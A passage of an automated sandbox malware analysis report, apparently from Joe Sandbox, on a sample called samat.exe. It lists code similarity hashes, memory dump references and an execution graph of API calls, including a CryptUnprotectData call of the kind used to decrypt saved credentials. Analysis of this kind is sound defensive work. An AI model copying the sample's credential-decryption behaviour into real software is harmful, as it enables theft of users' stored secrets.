                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                      • API String ID: 3580290477-3004328233
                                                                                                                                                                                                                                                                                      • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                                                      • Instruction ID: 5544536e54f649732cfc9ad443cc61b9a80f777ffa9e05f62b53230a93af300f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24419136B0861286EB15BF21D8422BCA398EB44794B95403BE94E43B85CFBDE4818322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 333f0d91c31fc5cb4db87eeaddf17072881df474e74a63838ce10eea95677d45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E41E533718A4181DB20AF25E8453AAA7A4FB88784FC44136EE4E87798DF7CD411C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                      • Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d4155d7d2cd958bd72502162b4ac7fdd9e655a56eb56c5e6449df122de90c34
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26210B63B0828145EB20AB21D84536DB3A9FB84B48FC54037D65D43A94DFBCE5458BA6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                      • Instruction ID: 1863c94761d3cd37f162583b0d1044e7a7f6754c115aebc7d930312b3f650e75
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2115E32608B8182EB219F15E840399B7E8FB88B84F584232DB8D07754DF7CC551C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                      • Instruction ID: bb244cd4ccd4689cf73846cbc48848b3004b054a83a1bceda0c2ca526cca3462
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701D422B1C20386F725BF60982337EA3A4EF48344FC44037D94D86681DEBCE5018B2A

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:2.5%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:3.9%
                                                                                                                                                                                                                                                                                      Total number of Nodes:1244
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:83
                                                                                                                                                                                                                                                                                      execution_graph 79240 7ff8b838ecc0 79244 7ff8b838ecda 79240->79244 79241 7ff8b838ef80 ERR_new 79242 7ff8b838ef8a ERR_set_debug 79241->79242 79247 7ff8b838efd7 79242->79247 79243 7ff8b838f011 ERR_new 79243->79242 79244->79241 79244->79243 79245 7ff8b838eff6 79244->79245 79244->79247 79249 7ff8b838f020 ERR_new ERR_set_debug 79244->79249 79250 7ff8b838ee3e BUF_MEM_grow_clean 79244->79250 79251 7ff8b838efad ERR_new ERR_set_debug 79244->79251 79246 7ff8b838f002 ERR_new 79245->79246 79245->79247 79248 7ff8b838ef4d ERR_set_debug 79246->79248 79248->79247 79249->79247 79250->79244 79250->79251 79251->79247 79252 7ff8b83a15a0 79253 7ff8b83a15b8 79252->79253 79254 7ff8b83a1700 79253->79254 79256 7ff8b83a16c6 ERR_new ERR_set_debug 79253->79256 79257 7ff8b83a16f9 79253->79257 79255 7ff8b83a1761 ERR_new ERR_set_debug 79254->79255 79254->79257 79255->79257 79256->79257 79258 7ff8b7eb9710 PyArg_ParseTupleAndKeywords 79259 7ff8b7eb9791 79258->79259 79260 7ff8b7eb97b6 79258->79260 79261 7ff8b7eb979f PyErr_SetString 79259->79261 79262 7ff8b7eb97cc ??0PyWinBufferView@@QEAA@PEAU_object@@_N1 79259->79262 79261->79260 79263 7ff8b7eb9807 ??1PyWinBufferView@@QEAA 79262->79263 79264 7ff8b7eb97ff ??1PyWinBufferView@@QEAA 79262->79264 79265 7ff8b7eb982c ??0PyWinBufferView@@QEAA@PEAU_object@@_N1 79263->79265 79268 7ff8b7eb9865 79263->79268 79264->79260 79265->79264 79266 7ff8b7eb9846 ??1PyWinBufferView@@QEAA 79265->79266 79266->79268 79267 7ff8b7eb9894 PyEval_SaveThread CryptUnprotectData PyEval_RestoreThread 79269 7ff8b7eb990d PyBytes_FromStringAndSize ?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W Py_BuildValue 79267->79269 79270 7ff8b7eb98ec ?PyWin_SetAPIError@@YAPEAU_object@@PEADJ ?PyWinObject_FreeWCHAR@@YAXPEA_W 79267->79270 79268->79267 79275 7ff8b7eb6a00 PyErr_Format PyArg_ParseTuple ?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK 79268->79275 79272 7ff8b7eb9950 LocalFree ?PyWinObject_FreeWCHAR@@YAXPEA_W 79269->79272 79273 7ff8b7eb994a LocalFree 79269->79273 79270->79260 79272->79260 79273->79272 79274 7ff8b7eb9888 79274->79260 79274->79267 79275->79274 79276 7ff8b834fd40 79277 7ff8b834fd50 79276->79277 79278 7ff8b834fd62 ERR_new ERR_set_debug ERR_set_error 79277->79278 79279 7ff8b834fda1 79277->79279 79280 7ff8b834fddb ASYNC_get_current_job 79279->79280 79281 7ff8b834fde5 79279->79281 79280->79281 79282 7ff7e12d5628 79283 7ff7e12d565f 79282->79283 79284 7ff7e12d5642 79282->79284 79283->79284 79285 7ff7e12d5672 CreateFileW 79283->79285 79307 7ff7e12d4ee8 11 API calls _get_daylight 79284->79307 79287 7ff7e12d56a6 79285->79287 79288 7ff7e12d56dc 79285->79288 79310 7ff7e12d577c 59 API calls 3 library calls 79287->79310 79311 7ff7e12d5c04 46 API calls 3 library calls 79288->79311 79289 7ff7e12d5647 79308 7ff7e12d4f08 11 API calls _get_daylight 79289->79308 79293 7ff7e12d56b4 79296 7ff7e12d56d1 CloseHandle 79293->79296 79297 7ff7e12d56bb CloseHandle 79293->79297 79294 7ff7e12d56e1 79298 7ff7e12d56e5 79294->79298 79299 7ff7e12d5710 79294->79299 79295 7ff7e12d564f 79309 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79295->79309 79302 7ff7e12d565a 79296->79302 79297->79302 79312 7ff7e12d4e7c 11 API calls 2 library calls 79298->79312 79313 7ff7e12d59c4 51 API calls 79299->79313 79304 7ff7e12d571d 79314 7ff7e12d5b00 21 API calls _fread_nolock 79304->79314 79305 7ff7e12d56ef 79305->79302 79307->79289 79308->79295 79309->79302 79310->79293 79311->79294 79312->79305 79313->79304 79314->79305 79315 7ff8b838f6b0 79325 7ff8b838f6cc 79315->79325 79316 7ff8b838f762 ERR_new ERR_set_debug 79318 7ff8b838f991 79316->79318 79317 7ff8b838fa45 79317->79318 79319 7ff8b838fa51 ERR_new 79317->79319 79320 7ff8b838fa5b ERR_set_debug 79319->79320 79320->79318 79321 7ff8b838f9e4 ERR_new 79321->79320 79322 7ff8b838f998 79322->79318 79322->79321 79323 7ff8b838fa2c 79324 7ff8b838fa36 ERR_new 79323->79324 79324->79317 79325->79316 79325->79317 79325->79318 79325->79322 79325->79323 79326 7ff8b838fa13 79325->79326 79327 7ff8b838fa1d ERR_new 79326->79327 79327->79323 79328 7ff7e12c2fe0 79329 7ff7e12c2ff0 79328->79329 79330 7ff7e12c3041 79329->79330 79331 7ff7e12c302b 79329->79331 79333 7ff7e12c3061 79330->79333 79344 7ff7e12c3077 __vcrt_freefls 79330->79344 79390 7ff7e12c2710 54 API calls _log10_special 79331->79390 79391 7ff7e12c2710 54 API calls _log10_special 79333->79391 79336 7ff7e12c3037 __vcrt_freefls 79392 7ff7e12cc550 79336->79392 79339 7ff7e12c3349 79407 7ff7e12c2710 54 API calls _log10_special 79339->79407 79342 7ff7e12c3333 79406 7ff7e12c2710 54 API calls _log10_special 79342->79406 79344->79336 79344->79339 79344->79342 79345 7ff7e12c330d 79344->79345 79347 7ff7e12c3207 79344->79347 79356 7ff7e12c1470 79344->79356 79386 7ff7e12c1c80 79344->79386 79405 7ff7e12c2710 54 API calls _log10_special 79345->79405 79348 7ff7e12c3273 79347->79348 79401 7ff7e12da404 37 API calls 2 library calls 79347->79401 79350 7ff7e12c3290 79348->79350 79351 7ff7e12c329e 79348->79351 79402 7ff7e12da404 37 API calls 2 library calls 79350->79402 79403 7ff7e12c2dd0 37 API calls 79351->79403 79354 7ff7e12c329c 79404 7ff7e12c2500 54 API calls __vcrt_freefls 79354->79404 79408 7ff7e12c45c0 79356->79408 79359 7ff7e12c14bc 79418 7ff7e12d06d4 79359->79418 79360 7ff7e12c149b 79448 7ff7e12c2710 54 API calls _log10_special 79360->79448 79363 7ff7e12c14ab 79363->79344 79364 7ff7e12c14d1 79365 7ff7e12c14d5 79364->79365 79366 7ff7e12c14f8 79364->79366 79449 7ff7e12d4f08 11 API calls _get_daylight 79365->79449 79369 7ff7e12c1532 79366->79369 79370 7ff7e12c1508 79366->79370 79368 7ff7e12c14da 79450 7ff7e12c2910 54 API calls _log10_special 79368->79450 79373 7ff7e12c1538 79369->79373 79381 7ff7e12c154b 79369->79381 79451 7ff7e12d4f08 11 API calls _get_daylight 79370->79451 79422 7ff7e12c1210 79373->79422 79374 7ff7e12c1510 79452 7ff7e12c2910 54 API calls _log10_special 79374->79452 79378 7ff7e12c14f3 __vcrt_freefls 79444 7ff7e12d004c 79378->79444 79379 7ff7e12c15c4 79379->79344 79381->79378 79382 7ff7e12c15d6 79381->79382 79453 7ff7e12d039c 79381->79453 79456 7ff7e12d4f08 11 API calls _get_daylight 79382->79456 79384 7ff7e12c15db 79457 7ff7e12c2910 54 API calls _log10_special 79384->79457 79387 7ff7e12c1ca5 79386->79387 79698 7ff7e12d4984 79387->79698 79390->79336 79391->79336 79393 7ff7e12cc559 79392->79393 79394 7ff7e12c31fa 79393->79394 79395 7ff7e12cc8e0 IsProcessorFeaturePresent 79393->79395 79396 7ff7e12cc8f8 79395->79396 79721 7ff7e12ccad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 79396->79721 79398 7ff7e12cc90b 79722 7ff7e12cc8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 79398->79722 79401->79348 79402->79354 79403->79354 79404->79336 79405->79336 79406->79336 79407->79336 79409 7ff7e12c45cc 79408->79409 79458 7ff7e12c9390 79409->79458 79411 7ff7e12c45f4 79412 7ff7e12c9390 2 API calls 79411->79412 79413 7ff7e12c4607 79412->79413 79463 7ff7e12d5f94 79413->79463 79416 7ff7e12cc550 _log10_special 8 API calls 79417 7ff7e12c1493 79416->79417 79417->79359 79417->79360 79419 7ff7e12d0704 79418->79419 79631 7ff7e12d0464 79419->79631 79421 7ff7e12d071d 79421->79364 79423 7ff7e12c1268 79422->79423 79424 7ff7e12c126f 79423->79424 79425 7ff7e12c1297 79423->79425 79648 7ff7e12c2710 54 API calls _log10_special 79424->79648 79428 7ff7e12c12b1 79425->79428 79429 7ff7e12c12d4 79425->79429 79427 7ff7e12c1282 79427->79378 79649 7ff7e12d4f08 11 API calls _get_daylight 79428->79649 79433 7ff7e12c12e6 79429->79433 79442 7ff7e12c1309 memcpy_s 79429->79442 79431 7ff7e12c12b6 79650 7ff7e12c2910 54 API calls _log10_special 79431->79650 79651 7ff7e12d4f08 11 API calls _get_daylight 79433->79651 79435 7ff7e12d039c _fread_nolock 53 API calls 79435->79442 79436 7ff7e12c12eb 79652 7ff7e12c2910 54 API calls _log10_special 79436->79652 79438 7ff7e12c12cf __vcrt_freefls 79438->79378 79439 7ff7e12c13cf 79653 7ff7e12c2710 54 API calls _log10_special 79439->79653 79442->79435 79442->79438 79442->79439 79443 7ff7e12d0110 37 API calls 79442->79443 79644 7ff7e12d0adc 79442->79644 79443->79442 79445 7ff7e12d007c 79444->79445 79670 7ff7e12cfe28 79445->79670 79447 7ff7e12d0095 79447->79379 79448->79363 79449->79368 79450->79378 79451->79374 79452->79378 79682 7ff7e12d03bc 79453->79682 79456->79384 79457->79378 79459 7ff7e12c93d6 79458->79459 79460 7ff7e12c93b2 MultiByteToWideChar 79458->79460 79461 7ff7e12c93f3 MultiByteToWideChar 79459->79461 79462 7ff7e12c93ec __vcrt_freefls 79459->79462 79460->79459 79460->79462 79461->79462 79462->79411 79464 7ff7e12d5ec8 79463->79464 79465 7ff7e12d5eee 79464->79465 79467 7ff7e12d5f21 79464->79467 79494 7ff7e12d4f08 11 API calls _get_daylight 79465->79494 79469 7ff7e12d5f34 79467->79469 79470 7ff7e12d5f27 79467->79470 79468 7ff7e12d5ef3 79495 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79468->79495 79482 7ff7e12dac28 79469->79482 79496 7ff7e12d4f08 11 API calls _get_daylight 79470->79496 79474 7ff7e12c4616 79474->79416 79476 7ff7e12d5f55 79489 7ff7e12dfecc 79476->79489 79477 7ff7e12d5f48 79497 7ff7e12d4f08 11 API calls _get_daylight 79477->79497 79480 7ff7e12d5f68 79498 7ff7e12d5478 LeaveCriticalSection 79480->79498 79499 7ff7e12e02d8 EnterCriticalSection 79482->79499 79484 7ff7e12dac3f 79485 7ff7e12dac9c 19 API calls 79484->79485 79486 7ff7e12dac4a 79485->79486 79487 7ff7e12e0338 _isindst LeaveCriticalSection 79486->79487 79488 7ff7e12d5f3e 79487->79488 79488->79476 79488->79477 79500 7ff7e12dfbc8 79489->79500 79493 7ff7e12dff26 79493->79480 79494->79468 79495->79474 79496->79474 79497->79474 79505 7ff7e12dfc03 __vcrt_FlsAlloc 79500->79505 79502 7ff7e12dfea1 79519 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79502->79519 79504 7ff7e12dfdd3 79504->79493 79512 7ff7e12e6d54 79504->79512 79510 7ff7e12dfdca 79505->79510 79515 7ff7e12d7a3c 51 API calls 3 library calls 79505->79515 79507 7ff7e12dfe35 79507->79510 79516 7ff7e12d7a3c 51 API calls 3 library calls 79507->79516 79509 7ff7e12dfe54 79509->79510 79517 7ff7e12d7a3c 51 API calls 3 library calls 79509->79517 79510->79504 79518 7ff7e12d4f08 11 API calls _get_daylight 79510->79518 79520 7ff7e12e6354 79512->79520 79515->79507 79516->79509 79517->79510 79518->79502 79519->79504 79521 7ff7e12e636b 79520->79521 79522 7ff7e12e6389 79520->79522 79574 7ff7e12d4f08 11 API calls _get_daylight 79521->79574 79522->79521 79524 7ff7e12e63a5 79522->79524 79531 7ff7e12e6964 79524->79531 79525 7ff7e12e6370 79575 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79525->79575 79529 7ff7e12e637c 79529->79493 79577 7ff7e12e6698 79531->79577 79534 7ff7e12e69f1 79597 7ff7e12d8520 79534->79597 79535 7ff7e12e69d9 79609 7ff7e12d4ee8 11 API calls _get_daylight 79535->79609 79545 7ff7e12e63d0 79545->79529 79576 7ff7e12d84f8 LeaveCriticalSection 79545->79576 79554 7ff7e12e69de 79610 7ff7e12d4f08 11 API calls _get_daylight 79554->79610 79574->79525 79575->79529 79578 7ff7e12e66c4 79577->79578 79586 7ff7e12e66de 79577->79586 79578->79586 79622 7ff7e12d4f08 11 API calls _get_daylight 79578->79622 79580 7ff7e12e66d3 79623 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79580->79623 79582 7ff7e12e67ad 79596 7ff7e12e680a 79582->79596 79628 7ff7e12d9b78 37 API calls 2 library calls 79582->79628 79583 7ff7e12e675c 79583->79582 79626 7ff7e12d4f08 11 API calls _get_daylight 79583->79626 79586->79583 79624 7ff7e12d4f08 11 API calls _get_daylight 79586->79624 79587 7ff7e12e67a2 79627 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79587->79627 79589 7ff7e12e6806 79592 7ff7e12e6888 79589->79592 79589->79596 79591 7ff7e12e6751 79625 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79591->79625 79629 7ff7e12da900 17 API calls __CxxCallCatchBlock 79592->79629 79596->79534 79596->79535 79630 7ff7e12e02d8 EnterCriticalSection 79597->79630 79609->79554 79610->79545 79622->79580 79623->79586 79624->79591 79625->79583 79626->79587 79627->79582 79628->79589 79632 7ff7e12d04ce 79631->79632 79633 7ff7e12d048e 79631->79633 79632->79633 79635 7ff7e12d04da 79632->79635 79643 7ff7e12da814 37 API calls 2 library calls 79633->79643 79642 7ff7e12d546c EnterCriticalSection 79635->79642 79636 7ff7e12d04b5 79636->79421 79638 7ff7e12d04df 79639 7ff7e12d05e8 71 API calls 79638->79639 79640 7ff7e12d04f1 79639->79640 79641 7ff7e12d5478 _fread_nolock LeaveCriticalSection 79640->79641 79641->79636 79643->79636 79645 7ff7e12d0b0c 79644->79645 79654 7ff7e12d082c 79645->79654 79647 7ff7e12d0b2a 79647->79442 79648->79427 79649->79431 79650->79438 79651->79436 79652->79438 79653->79438 79655 7ff7e12d084c 79654->79655 79656 7ff7e12d0879 79654->79656 79655->79656 79657 7ff7e12d0856 79655->79657 79658 7ff7e12d0881 79655->79658 79656->79647 79668 7ff7e12da814 37 API calls 2 library calls 79657->79668 79661 7ff7e12d076c 79658->79661 79669 7ff7e12d546c EnterCriticalSection 79661->79669 79663 7ff7e12d0789 79664 7ff7e12d07ac 74 API calls 79663->79664 79665 7ff7e12d0792 79664->79665 79666 7ff7e12d5478 _fread_nolock LeaveCriticalSection 79665->79666 79667 7ff7e12d079d 79666->79667 79667->79656 79668->79656 79671 7ff7e12cfe43 79670->79671 79672 7ff7e12cfe71 79670->79672 79681 7ff7e12da814 37 API calls 2 library calls 79671->79681 79675 7ff7e12cfe63 79672->79675 79680 7ff7e12d546c EnterCriticalSection 79672->79680 79675->79447 79676 7ff7e12cfe88 79677 7ff7e12cfea4 72 API calls 79676->79677 79678 7ff7e12cfe94 79677->79678 79679 7ff7e12d5478 _fread_nolock LeaveCriticalSection 79678->79679 79679->79675 79681->79675 79683 7ff7e12d03e6 79682->79683 79694 7ff7e12d03b4 79682->79694 79684 7ff7e12d0432 79683->79684 79687 7ff7e12d03f5 __scrt_get_show_window_mode 79683->79687 79683->79694 79695 7ff7e12d546c EnterCriticalSection 79684->79695 79686 7ff7e12d043a 79689 7ff7e12d013c _fread_nolock 51 API calls 79686->79689 79696 7ff7e12d4f08 11 API calls _get_daylight 79687->79696 79691 7ff7e12d0451 79689->79691 79690 7ff7e12d040a 79697 7ff7e12da8e0 37 API calls _invalid_parameter_noinfo 79690->79697 79693 7ff7e12d5478 _fread_nolock LeaveCriticalSection 79691->79693 79693->79694 79694->79381 79696->79690 79697->79694 79701 7ff7e12d49de 79698->79701 79699 7ff7e12d4a03 79716 7ff7e12da814 37 API calls 2 library calls 79699->79716 79700 7ff7e12d4a3f 79717 7ff7e12d2c10 49 API calls _invalid_parameter_noinfo 79700->79717 79701->79699 79701->79700 79704 7ff7e12d4a2d 79706 7ff7e12cc550 _log10_special 8 API calls 79704->79706 79705 7ff7e12d4b1c 79720 7ff7e12da948 11 API calls 2 library calls 79705->79720 79709 7ff7e12c1cc8 79706->79709 79708 7ff7e12d4ad6 79708->79705 79710 7ff7e12d4b40 79708->79710 79711 7ff7e12d4af1 79708->79711 79712 7ff7e12d4ae8 79708->79712 79709->79344 79710->79705 79713 7ff7e12d4b4a 79710->79713 79718 7ff7e12da948 11 API calls 2 library calls 79711->79718 79712->79705 79712->79711 79719 7ff7e12da948 11 API calls 2 library calls 79713->79719 79716->79704 79717->79708 79718->79704 79719->79704 79720->79704 79721->79398 79723 7ff8b7ff1230 GetSystemInfo 79724 7ff8b7ff1264 79723->79724 79725 7ff8b8002250 79726 7ff8b80022ab 79725->79726 79727 7ff8b80022bd strcmp 79726->79727 79728 7ff8b80022d0 79726->79728 79727->79728 79745 7ff8b7fe6180 79728->79745 79731 7ff8b7fe6180 new[] 14 API calls 79733 7ff8b800260a 79731->79733 79739 7ff8b80023c4 79733->79739 79749 7ff8b7ff92b0 79733->79749 79736 7ff8b7fe6180 new[] 14 API calls 79738 7ff8b80023b8 79736->79738 79737 7ff8b8002665 79744 7ff8b80027c9 79737->79744 79781 7ff8b7ff8830 14 API calls 79737->79781 79738->79739 79740 7ff8b80023fd memcpy 79738->79740 79743 7ff8b8002408 79738->79743 79772 7ff8b8112900 79739->79772 79740->79743 79743->79731 79743->79739 79743->79744 79744->79739 79744->79744 79782 7ff8b7ff8a10 79744->79782 79746 7ff8b7fe6199 79745->79746 79747 7ff8b7fe6240 79745->79747 79746->79747 79793 7ff8b7fe5b35 malloc 79746->79793 79747->79736 79747->79739 79747->79743 79750 7ff8b7ff9335 79749->79750 79751 7ff8b7ff948d 79749->79751 79750->79751 79752 7ff8b7ff934e 79750->79752 79754 7ff8b7fe6180 new[] 14 API calls 79751->79754 79766 7ff8b7ff9390 79751->79766 79758 7ff8b7fe6180 new[] 14 API calls 79752->79758 79753 7ff8b7fe6180 new[] 14 API calls 79755 7ff8b7ff93df 79753->79755 79756 7ff8b7ff94c5 79754->79756 79757 7ff8b7ff93eb memset 79755->79757 79770 7ff8b7ff95c2 79755->79770 79756->79766 79756->79770 79812 7ff8b80a5ae0 14 API calls 79756->79812 79759 7ff8b7ff9455 memcpy 79757->79759 79765 7ff8b7ff9679 79757->79765 79760 7ff8b7ff9369 79758->79760 79761 7ff8b7ff9477 memcpy 79759->79761 79762 7ff8b7ff962b 79759->79762 79763 7ff8b7ff9375 memcpy 79760->79763 79760->79770 79764 7ff8b7ff962e memcpy memcpy 79761->79764 79762->79764 79763->79766 79764->79765 79769 7ff8b7ff9734 79765->79769 79798 7ff8b7feffd0 79765->79798 79766->79753 79766->79766 79766->79770 79769->79770 79813 7ff8b7ff8830 14 API calls 79769->79813 79770->79737 79773 7ff8b8112909 79772->79773 79774 7ff8b8112954 IsProcessorFeaturePresent 79773->79774 79775 7ff8b80023e1 79773->79775 79776 7ff8b811296c 79774->79776 79825 7ff8b8112b4c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 79776->79825 79778 7ff8b811297f 79826 7ff8b8112920 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 79778->79826 79781->79744 79784 7ff8b7ff8a43 79782->79784 79827 7ff8b7ffdec0 79784->79827 79785 7ff8b7ff8b0c 79833 7ff8b7ff42a0 79785->79833 79788 7ff8b7ff8b54 79837 7ff8b7ff6c90 memset 